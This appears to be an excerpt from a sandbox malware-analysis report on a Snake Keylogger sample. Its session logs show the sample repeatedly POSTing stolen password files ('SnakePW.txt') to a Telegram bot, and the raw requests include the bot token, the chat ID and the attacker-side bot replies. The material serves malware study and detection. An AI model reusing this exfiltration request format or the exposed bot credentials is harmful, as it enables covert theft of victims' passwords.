                                                                    2022-06-26 07:33:01 UTC90INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66802,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228781,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    54192.168.2.549841149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:01 UTC91OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e22c895b
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:01 UTC91OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 32 32 63 38 39 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e22c895bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:01 UTC92INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:01 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:01 UTC92INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66803,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228781,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    55192.168.2.549844149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:02 UTC92OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e2635c53
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:02 UTC93OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 32 36 33 35 63 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e2635c53Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:02 UTC93INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:02 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:02 UTC94INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66805,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228782,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    56192.168.2.549847149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:02 UTC94OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e2a8802e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:02 UTC94OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 32 61 38 38 30 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e2a8802eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:02 UTC95INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:02 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:02 UTC95INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66806,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228782,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    57192.168.2.549852149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:02 UTC96OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e2e41b12
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:02 UTC96OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 32 65 34 31 62 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e2e41b12Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:03 UTC97INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:03 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:03 UTC97INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66807,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228783,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    58192.168.2.549857149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:03 UTC97OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e329424c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:03 UTC98OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 33 32 39 34 32 34 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e329424cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:03 UTC98INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:03 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:03 UTC99INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66809,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228783,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    59192.168.2.549859149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:03 UTC99OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e3673d16
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:03 UTC99OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 33 36 37 33 64 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e3673d16Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:04 UTC100INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:04 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:04 UTC100INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66810,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228784,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    6192.168.2.549774149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:40 UTC10OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d5b1ba0c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:40 UTC10OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 35 62 31 62 61 30 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d5b1ba0cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:41 UTC10INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:41 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
